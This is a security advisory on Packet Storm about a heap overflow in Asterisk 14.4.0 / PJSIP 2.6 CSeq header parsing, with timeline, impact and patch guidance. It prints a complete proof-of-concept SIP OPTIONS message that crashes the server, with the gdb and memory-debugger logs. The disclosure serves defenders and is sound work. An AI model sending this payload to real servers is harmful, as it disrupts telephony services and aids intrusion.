what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Asterisk 14.4.0 PJSIP 2.6 Heap Overflow

Asterisk 14.4.0 PJSIP 2.6 Heap Overflow
Posted May 22, 2017
Authored by Sandro Gauci, Alfred Farrugia

Asterisk version 14.4.0 with PJSIP version 2.6 suffers from a heap overflow vulnerability in CSEQ header parsing.

tags | exploit, overflow
SHA-256 | 96d2411683190b99bf76dad788720f5b886c567643bf4124f892badaecf39a31

Asterisk 14.4.0 PJSIP 2.6 Heap Overflow

Change Mirror Download
# Heap overflow in CSEQ header parsing affects Asterisk chan_pjsip and
PJSIP

- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Vulnerable version: Asterisk 14.4.0 running `chan_pjsip`, PJSIP 2.6
- References: AST-2017-002
- Enable Security Advisory:
<https://github.com/EnableSecurity/advisories/tree/master/ES2017-01-asterisk-pjsip-cseq-overflow>
- Vendor Advisory:
<https://downloads.asterisk.org/pub/security/AST-2017-002.html>
- Timeline:
- Report date: 2017-04-12
- Digium confirmed issue: 2017-04-12
- Digium patch and advisory: 2017-05-19
- PJSIP added patch by Digium: 2017-05-21
- Enable Security advisory: 2017-05-23

## Description

A specially crafted SIP message with a long CSEQ value will cause a heap
overflow in PJSIP.

## Impact

Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use. This vulnerability is likely to be abused for
remote code execution and may affect other code that makes use of PJSIP.

## How to reproduce the issue

We made use of the following SIP message which was sent to Asterisk over
UDP to reproduce the issue:

OPTIONS sip:localhost:5060 SIP/2.0
From: <sip:test@localhost>
To: <sip:test2@localhost>
Call-ID: aa@0000000000
CSeq: 0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Via: SIP/2.0/UDP 195.37.78.177:5060
Contact: <sip:test@localhost>
Content-Length: 0


.

The following is a log from running Asterisk in gdb:

gdb --args asterisk -c

....

Asterisk Ready.
[New Thread 0x7fffc87a7700 (LWP 412)]
*CLI> [Thread 0x7ffff4bfe700 (LWP 379) exited]
[Thread 0x7ffff4cf6700 (LWP 375) exited]
[Thread 0x7ffff4dee700 (LWP 373) exited]

*CLI> [Thread 0x7ffff4e6a700 (LWP 372) exited]
[Thread 0x7ffff4f62700 (LWP 370) exited]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd6403700 (LWP 394)]
malloc_consolidate (av=av@entry=0x7fffe8000020) at malloc.c:4151
4151 malloc.c: No such file or directory.
(gdb) bt
#0 malloc_consolidate (av=av@entry=0x7fffe8000020) at malloc.c:4151
#1 0x00007ffff5499ce8 in _int_malloc (av=0x7fffe8000020,
bytes=4096) at malloc.c:3423
#2 0x00007ffff549c6c0 in __GI___libc_malloc (bytes=4096) at
malloc.c:2891
#3 0x00007ffff78f0965 in default_block_alloc
(factory=0x7fffd7dee0a0 <caching_pool>, size=4096) at
../src/pj/pool_policy_malloc.c:46
#4 0x00007ffff78f801c in pj_pool_create_int
(f=f@entry=0x7fffd7dee0a0 <caching_pool>,
name=name@entry=0x7ffff790ad28 "tdta%p",
initial_size=initial_size@entry=4096,
increment_size=increment_size@entry=4000,
callback=callback@entry=0x7ffff78741a0 <pool_callback>) at
../src/pj/pool.c:201

When the Asterisk Malloc debugger is used, the following logs can be
seen upon exiting the process, showing that other memory segments are
being overwritten by our malformed `CSEQ`:

Asterisk Malloc Debugger Started (see
/opt/asterisk/var/log/asterisk/mmlog))
Asterisk Ready.
[Apr 11 23:52:41] NOTICE[18382]: res_pjsip/pjsip_distributor.c:536
log_failed_request: Request 'OPTIONS' from '<sip:test@localhost>'
failed for '10.0.2.2:44779' (callid: aa@0000000000) - No matching
endpoint found
^CAsterisk cleanly ending (0).
Executing last minute cleanups
== Destroying musiconhold processes
== Manager unregistered action DBGet
== Manager unregistered action DBPut
== Manager unregistered action DBDel
== Manager unregistered action DBDelTree
WARNING: High fence violation of 0x7ff0640058d0 allocated at
../src/pj/pool_policy_malloc.c default_block_alloc() line 46
WARNING: Memory corrupted after free of 0x7ff064006970 allocated at
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$0$$aa@0000000000$195.37.78.177:5060$
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$0$$aa@0000000000$195.37.78.177:5060$()
line 1094795585
Segmentation fault

This security issue was discovered through the use of simple fuzzing
with [Radamsa](https://github.com/aoh/radamsa) and our internal toolset.

## Solutions and recommendations

Apply fix issued by Asterisk, upgrade to Asterisk 13.15.1, 14.4.1 or
13.13-cert4.

If making use of PJSIP, apply the patch in revision 5593. See
<https://trac.pjsip.org/repos/ticket/2016>.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) provides Information
Security services, including Penetration Testing, Research and
Development, to help protect client networks and applications against
online attackers.

## Disclaimer

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close